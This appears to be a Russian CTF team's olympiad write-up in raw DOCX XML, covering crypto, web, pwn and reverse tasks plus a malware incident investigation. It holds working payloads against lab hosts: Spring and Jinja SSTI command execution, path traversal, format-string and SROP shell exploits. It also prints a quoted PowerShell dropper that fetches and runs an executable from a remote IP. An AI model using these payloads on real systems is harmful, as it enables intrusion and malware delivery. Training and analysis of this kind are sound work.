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Отчет о проделанной работе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Информационная безопасность 2023/2024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енотики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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Порхунов Арсений Вячеславович,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aporkhunov@yandex-team.ru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Герасименко Яна Васильевна,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yanagerasimenko@bk.ru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Борозенец Егор Владиславович,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borozenets2006@mail.ru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Кудрявцев Кирилл Александрович,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kir.kud@inbox.ru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Наступательная кибербезопасность</w:t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rypto 30</w:t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Нам дана система 10 полиномиальных уравнений 17 степени от 3 переменных. Просто найдем их GCD через базис гребнера, получим параметры LCG и затем флаг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= eval(open('data').read())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states = data['states']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data['n']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 = data['enc']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P.&lt;a,b,x&gt; = PolynomialRing(Zmod(n))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xt = x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eqs = []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i in range(len(states)):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eqs.append((xt)^17-states[i])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xt=a*xt+b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basis = Ideal(eqs).groebner_basis()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int(-(basis[1]-a))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flag= (enc^^a)</w:t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Crypto 20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Классическая атака Полига-Хеллмана на ECC, когда мы ищем маленькие простые делители порядка кривой и восстанавливаем dlog.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sage.all import *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sage.rings.factorint import factor_trial_division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cysignals.alarm import alarm, AlarmInterrupt, cancel_alarm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telnetlib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ast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sage.all import *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 = telnetlib.Telnet('192.168.12.13', int(1228)  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time.sleep(4)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print(io.read_very_eager())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jses = []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i in range(70):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io.write(b'get_task\n')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recv = io.read_until(b'\n')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print(recv)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js = ast.literal_eval(recv.decode().strip())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jses.append(js)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print(i)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print('done')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mods = []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vals = []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powers = []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ords = []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= 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dct = {}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js in jses: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 = js['a']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 = js['b']#randrange(2**128)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#randrange(2**128)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 = js['p']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 = EllipticCurve(Zmod(p), [a, b])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 = E.lift_x(Integer(js['G.x']))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 = E(Integer(js['P.x']),Integer(js['P.y']))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alarm(15)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ord = G.order()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ord != P.order():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cancel_alarm()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print('plox')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continue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ords.append((o,ord))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fs =list(factor_trial_division(ord,2^20))[:-1]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print(fs)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except AlarmInterrupt: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print('giga plox')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o+=1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continue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cancel_alarm()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o+=1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sub_ms = []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sub_vls = []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i,pw in fs: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pw&gt;=2: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continue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 = i**pw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i not in mods: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M*=p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mods.append(i)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vals.append(pw)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aboba = Integer(ord/p)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Gt = aboba*G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Pt = aboba*P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lg = discrete_log(Pt,Gt,operation='+')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print(Pt==lg*Gt)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print('mod log',p,lg)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vals.append(lg)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dct[i] = [lg]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# for lg in range(p):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#     if Gt*lg ==Pt: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#         vals.append(lg)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#         print('mod val', i,lg)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#         break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# else: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#     print('not found')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aboba = Integer(ord/p)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Gt = aboba*G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Pt = aboba*P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lg = discrete_log(Pt,Gt,operation='+')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print(Pt==lg*Gt)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print('mod log',p,lg)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print('need', vals[mods.index(p)])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lg not in dct[i]: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dct[i].append(lg)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M&gt;2**320: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print(int(CRT_list(vals,[mods[i]**powers[i] for i in range(len(mods))])).to_bytes(320//8,'big'))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print(vals)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print(mods)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print(dct)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 = []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 = []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k,v in dct.items():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len(v)==1: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ms.append(k)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vs.append(v[0])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 = CRT_list(vs,ms)# nto{50mb0dy_45k3d_m3_f0r_d1scr3t3_l0g_2}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print(int(res).to_bytes(320//8,'big'))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Сrypto 10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requests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pin in range(100001):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if requests.post('http://192.168.12.12:5000/api/EncryptPin', json={"pin":str(pin)}).json()['encrypted_pin'] == requests.get('http://192.168.12.12:5000/api/EncryptedPin').json()['encrypted_pin']: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print("FOUND", pin)#3561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break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print(pin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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брутим пин,захотим под ним и забираем флаг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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В исходниках странички находим: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http://192.168.12.10:5001/download?file_type=file1.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> с текстом: maybe in etc/secret ???</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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делаем запрос на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http://192.168.12.10:5001/download?file_type=../../../../etc/secret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  <w:t xml:space="preserve">получаем флаг: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nto{P6t9_T77v6RsA1}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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20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Декомпилируем предоставленный jar файл и видим два эндпоинта - /login с query-параметром password и /doc/{...}, который еще не имплементирован. Во втором замечаем, что допустима SSTI из-за уязвимости в фреймворке Spring. Получаем запрос следующего вида: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http://192.168.12.13:8090/doc/__$%7Bnew%20java.util.Scanner</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(T(java.lang.Runtime).getRuntime().exec(%22touch%20pwned%22))%7D__::.x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Ответ на команду получить уже не так легко, решаем вернуться к изучению логики работы приложения. Замечаем, что пароль для эндпоинта /login читается из файла password.txt, а если его нет, берется стандартный пароль password. С помощью найденной выше уязвимости удаленного исполнения кода удаляем файл password.txt, после чего заходим на /login с паролем password, получая флаг: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nto{abobovichasdfas}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30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Для решения данной задачи было два вектора решения. Оба из них имеют одинаковое начало. Зайдя на сайт замечаем форму и заходим смотреть source code. Обнаруживаем, что некоторые символы и слова фильтруются. Это указывает на Jinja SSTI. Замечаем, что символы фигурных скобок на самом деле не фильтруются, так как используется регулярное выражение \w+. Далее видим, что вебсервер фильтрует запросы на эндпоинт, на котором есть SSTI. Для этого решаем воспользоваться другой уязвимостью - HTTP Smuggling, манипулируя значением Content-length. Тем не менее, так как таск был рассчитан на 120+ человек, получить запрос было тяжело. Поэтому было принято решение искать другой вектор. Им оказался миссконфиг, позволяющий добавить один слэш. В конфиге haproxy видим следующую строчку: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acl restricted_page path_beg,url_dec -i /flag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Эта строчка проверяет, что путь начинается со /flag, вне зависимости от регистра. При этом для Flask валидным путем является и путь, начинающийся с двух слешей - //flag, который спокойно проходит проверку фильтром и попадает на уязвимый эндпоинт Flask. Далее с помощью несложной инъекции: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http://192.168.12.11:8001//flag?name={{%20cycler.__init__.__globals__.os.popen(%27cat%20flag.txt%27).read()%20</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">}}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получаем флаг: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nto{Ht1P_sM088Lin6_88Ti}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Pwn 10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После реверс-инжиниринга приложения видим, что строка, читаемая из стандартного ввода, сразу выводится в стандартный вывод с помощью printf, без какой-либо сериализации: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local_418 [1032];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fgets(local_418,0x400,stdin);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printf(local_418);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br w:type="textWrapping"/>
        <w:t xml:space="preserve">Таким образом, программа уязвима к инъекции форматной строки. Также в программе есть функция win, которая запускает оболочку bash. Таким образом, с помощью найденной выше уязвимости, можно подменить адрес функции exit, которая вызывается в конце, на адрес функции win. С помощью pwntools формируем следующий эксплоит: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pwn import *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= "./main"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= context.binary = ELF(binary)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remote('192.168.12.13', 1923)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payload_writes =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e.got['exit']: e.sym['win']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payload = fmtstr_payload(6,payload_writes,write_size='short')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p.sendline(payload)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p.interactive()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В корне системы лежит файл с флагом: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nto{easy_formt_string}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spacing w:after="160" w:line="259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Pwn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0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https://github.com/ElikBelik77/ctfs-writeups/blob/master/offshift/moving_signals/exploit.py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pwn import *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elf = context.binary = ELF("./task")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context.log_level = logging.DEBUG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context.terminal = ["tmux", "splitw", "-h"]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do_debug():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return gdb.debug(elf.path, gdbscript = """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</w:t>
              <w:tab/>
              <w:t xml:space="preserve">break *0x41000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""")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do_local():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return process(elf.path)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do_remote():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return remote('192.168.12.13',1555)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pop_rax = 0x41018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start_offset = 0x41000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syscall_ret = 0x41015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#p = do_debug()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#p = do_local()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= do_remote()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#payload = b"A"*8 + p64(pop_rax) + p64(pop_rdi) + p64(0x41005) + p64(pop_rax) + p64(ret) +\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#p64(0x41005) + p64(pop_rax) + p64(push_rsp) + p64(0x41005) + p64(pop_rax) +\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#p64(0x41000) + p64(pop_rdi) + p64(start_offset)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payload = b"A"*8 + p64(pop_rax) + p64(15) + p64(syscall_ret)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 = SigreturnFrame()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frame.rax = 0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frame.rdi = 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frame.rsi = 0x41025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frame.rdx = 0x300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frame.rsp = 0x41025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frame.rip = syscall_ret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payload += bytes(frame)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p.send(payload)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input("...")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payload = p64(pop_rax) + p64(15) + p64(syscall_ret)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 = SigreturnFrame()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frame.rax = 59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frame.rdi = 0x41025+248 + 0x18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frame.rsi = 0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frame.rdx = 0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frame.rsp = 0x41000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frame.rip = syscall_ret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payload += bytes(frame) + b"/bin/sh\x00"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p.send(payload)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p.interactive()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FF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Базовая эксплуатация SROP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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10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#https://github.com/221294583/crc32/blob/master/vid.py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copy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crc32_table_polyrev=[]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poly_rev=0xedb88320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byte in range(256):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operator=copy.copy(byte)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bit in range(8):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 (operator&amp;0x1)!=0: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operator&gt;&gt;=1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operator^=poly_rev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else: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operator&gt;&gt;=1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crc32_table_polyrev.append(operator)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crc32_polyrev(line):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var=0xffffffff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ch in line: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operator=ord(ch)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operator=(operator^var)&amp;0xff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print(operator)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var=crc32_table_recip[operator]^(var&gt;&gt;8)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return var^0xffffffff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zlib import crc32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= dict()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i in range(256):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j in range(256):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 = bytes([i,j])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table[crc32(r)]=r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 =[ 0xEDCFE1F3, 0x646BCD23, 0x50F9AD57, 0xF299B1E1, 0xC6A9B6E4, 0x3280614C, 0x93772B02, 0xAB2C3A43, 0x2A0D936A, 0x1BFA14D4, 0x255D6F2F, 0xC447F66B, 0x5AD96CF5, 0xE964AD12]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b''.join(table[i] for i in arr)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120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Нашли обратную таблицу CRC32 и переписали алгоритм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="259" w:lineRule="auto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Расследование инцидента</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133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Часть 1 (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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Каким образом вредоносное ПО попало на компьютер пользователя? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:spacing w:after="240" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Пользователь получил письмо с почты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j.nathan@microsoft.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> с темой NDA Documents и архивом classified.rar во вложении. Там содержалась pdf, которая запускала cmd скрипт следующего содержания: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%~dp0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@powershell -command "($drop=Join-Path -Path $env:APPDATA -ChildPath Rjomba.exe);(New-Object System.Net.WebClient).DownloadFile('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http://95.169.192.220:8080/prikol.exe</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">', $drop); Start-Process -Verb runAs $drop" &amp;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TOP_SECRET.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139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Этот запуск также был замечен в просмотрщике событий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С какого сервера была скачана полезная нагрузка?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line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">С вебсервера по адресу http://95.169.192.220:8080 был скачан файл prikol.exe, который был помещен в папку AppData/Roaming под названием Rjomba.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:spacing w:after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 помощью какой уязвимости данное ВПО запустилось? В каком ПО?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D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Уязвимость в WinRAR (CVE-2023-38831) позволяла замаскировать исполняемый скрипт под любой другой файл с помощью добавления пробела перед расширением и папки с названием, равным названию файла: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https://habr.com/ru/articles/797127/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59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методы противодействия отладке использует программа?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:spacing w:after="240" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Она зашифровывает строчки простым алгоритмом, который мы инвертили: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void FUN_14004fac4(undefined4 param_1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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code *pcVar1;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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BOOL BVar2;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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LONG LVar3;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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PRUNTIME_FUNCTION FunctionEntry;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined *puVar4;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined8 in_stack_00000000;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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DWORD64 local_res10;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined local_res18 [8];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined local_res20 [8];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined auStack1480 [8];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined auStack1472 [232];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined local_4d8 [152];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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undefined *local_440;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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DWORD64 local_3e0;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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puVar4 = auStack1480;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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BVar2 = IsProcessorFeaturePresent(0x17);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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if (BVar2 != 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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pcVar1 = (code *)swi(0x29);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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(*pcVar1)(param_1);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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puVar4 = auStack1472;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + -8) = 0x14004faf8;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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FUN_14004fabc(3);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + -8) = 0x14004fb09;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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FUN_140087060(local_4d8,0,0x4d0);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + -8) = 0x14004fb13;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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RtlCaptureContext(local_4d8);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + -8) = 0x14004fb2d;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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FunctionEntry = RtlLookupFunctionEntry(local_3e0,&amp;local_res10,(PUNWIND_HISTORY_TABLE)0x0);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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if (FunctionEntry != (PRUNTIME_FUNCTION)0x0) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + 0x38) = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined **)(puVar4 + 0x30) = local_res18;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined **)(puVar4 + 0x28) = local_res20;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined **)(puVar4 + 0x20) = local_4d8;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + -8) = 0x14004fb6e;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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RtlVirtualUnwind(0,local_res10,local_3e0,FunctionEntry,*(PCONTEXT *)(puVar4 + 0x20),</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(PVOID **)(puVar4 + 0x28),*(PDWORD64 *)(puVar4 + 0x30),</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(PKNONVOLATILE_CONTEXT_POINTERS *)(puVar4 + 0x38));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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local_440 = &amp;stack0x00000008;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + -8) = 0x14004fba0;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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FUN_140087060(puVar4 + 0x50,0,0x98);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined8 *)(puVar4 + 0x60) = in_stack_00000000;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined4 *)(puVar4 + 0x50) = 0x40000015;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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*(undefined4 *)(puVar4 + 0x54) = 1;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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*(undefined8 *)(puVar4 + -8) = 0x14004fbc2;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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BVar2 = IsDebuggerPresent();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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 **)(puVar4 + 0x40) = puVar4 + 0x50;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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 **)(puVar4 + 0x48) = local_4d8;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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*(undefined8 *)(puVar4 + -8) = 0x14004fbdf;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)0x0);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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*(undefined8 *)(puVar4 + -8) = 0x14004fbea;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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LVar3 = UnhandledExceptionFilter((_EXCEPTION_POINTERS *)(puVar4 + 0x40));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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if ((LVar3 == 0) &amp;&amp; (BVar2 != 1)) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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*(undefined8 *)(puVar4 + -8) = 0x14004fbfb;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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FUN_14004fabc(3);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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return;</w:t>
            </w:r>
          </w:p>
